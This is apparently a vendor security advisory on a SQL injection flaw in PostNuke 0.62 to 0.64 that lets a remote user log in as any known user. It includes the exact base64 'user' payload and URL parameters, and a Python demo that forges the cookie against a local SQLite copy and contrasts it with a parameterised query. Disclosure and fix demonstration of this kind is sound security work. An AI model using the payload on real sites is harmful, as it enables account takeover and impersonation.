Title: PostNuke Unauthenticated User Login Vulnerability
Severity: HIGH
Description:
PostNuke, a fork of PHP-Nuke, is a content management system written in PHP. PostNuke versions 0.62 to 0.64 suffer from a vulnerability that allows a remote user to log in as any user whose username and user ID are known, without authentication. The problem lies in a failure to filter inappropriate characters (notably the single quote) from variables that a remote attacker can pass to the program's components. This allows the attacker to alter the MySQL query against the user table, bypassing the password check and assuming the identity of a specified user.
The component "article.php" calls a routine in "mainfile2.php" to update user information (i.e., log the user on) when the variable "save=1" (together with the appropriate user ID and name) is specified in the URL. This routine, getusrinfo(), performs a MySQL query to load user information from the database:
function getusrinfo($user) {
global $userinfo, $pntable;
// $user arrives base64-encoded from the "user" URL parameter; no validation is done
$user2 = base64_decode($user);
// Split into UID, username and password; each piece is interpolated raw into the SQL below
$user3 = explode(":", $user2);
$result = mysql_query("select uid, name, uname, email, femail, url, user_avatar, user_icq, user_occ, user_from, user_intrest, user_sig,
user_viewemail, user_theme, user_aim, user_yim, user_msnm, pass, storynum, umode, uorder, thold, noscore, bio, ublockon, ublock, theme,
commentmax, timezone_offset from $pntable[users] where uname='$user3[1]' and pass='$user3[2]'");
[... snip ...]
The variable $user (and thus $user3) is taken from the base64-encoded variable "user", which is passed to "article.php" as part of the URL. If the password field of the $user variable (exploded to $user3[2]) contains a single quote character followed by additional SQL, the condition "where uname='$user3[1]' and pass='$user3[2]'" can be bypassed, for example by appending "or uname='USERNAME'" to the query. Because "and" binds more tightly than "or", the resulting WHERE clause matches the row for USERNAME regardless of the password value.
This can be accomplished by base64-encoding a string similar to "USERID:USERNAME:' or uname='USERNAME" (without the double quotes; the query's own closing quote completes the injected string literal) and passing it as the "user" variable to article.php in conjunction with "save=1" (to reach the vulnerable routine) and "cookieusrtime=160000" (to stay "logged in" long enough to perform actions as the user whose account has been compromised).
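The following added example (not code from the advisory or from PostNuke) reproduces the query construction above against an in-memory SQLite table, builds the base64 "user" value described in the text, and shows the same lookup done with a parameterised query. The table name "nuke_users", the sample user rows and the reduced column list are assumptions standing in for $pntable[users] and the full column list in getusrinfo().

```python
import base64
import sqlite3

# Constructed sample rows; PostNuke stored "pass" alongside "uname" as the snippet shows.
# (Table name and the two sample users are assumptions for this example.)
SAMPLE_USERS = [
    (2, "admin", "s3cr3t"),
    (3, "bob", "hunter2"),
]


def make_db():
    """In-memory stand-in for the $pntable[users] table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table nuke_users (uid integer, uname text, pass text)")
    conn.executemany("insert into nuke_users values (?, ?, ?)", SAMPLE_USERS)
    return conn


def decode_user_cookie(user_b64):
    """Mirror of base64_decode() followed by explode(':') in getusrinfo()."""
    return base64.b64decode(user_b64).decode().split(":")


def vulnerable_getusrinfo(conn, user_b64):
    """Interpolates user3[1] and user3[2] into the SQL exactly as the PHP does."""
    user3 = decode_user_cookie(user_b64)
    sql = "select uid, uname from nuke_users where uname='%s' and pass='%s'" % (
        user3[1],
        user3[2],
    )
    return conn.execute(sql).fetchone()


def hardened_getusrinfo(conn, user_b64):
    """Same lookup with bound parameters: the quote in the payload is data, not SQL."""
    user3 = decode_user_cookie(user_b64)
    if len(user3) < 3:
        return None
    sql = "select uid, uname from nuke_users where uname=? and pass=?"
    return conn.execute(sql, (user3[1], user3[2])).fetchone()


def encode_user_cookie(uid, uname, password):
    """Build a legitimate 'user' value: UID:USERNAME:PASSWORD, base64-encoded."""
    raw = "%s:%s:%s" % (uid, uname, password)
    return base64.b64encode(raw.encode()).decode()


def forge_user_cookie(uid, uname):
    """Payload from the advisory: UID:USERNAME:' or uname='USERNAME
    The trailing quote already present in the query closes the injected literal,
    so the WHERE clause becomes  uname='X' and pass='' or uname='X'."""
    return encode_user_cookie(uid, uname, "' or uname='%s" % uname)


if __name__ == "__main__":
    db = make_db()
    forged = forge_user_cookie(2, "admin")
    print("vulnerable:", vulnerable_getusrinfo(db, forged))
    print("hardened:  ", hardened_getusrinfo(db, forged))
```

Binding the values fixes the injection; it does not address the cleartext password comparison the original query performs, which is a separate weakness.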
Affected Products:
- PostNuke Development Team PostNuke 0.62.0
- PostNuke Development Team PostNuke 0.63.0
- PostNuke Development Team PostNuke 0.64.0
References:
- PostNuke: PostNuke Product Page
- SourceForge: Project: PostNuke Content Management System
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.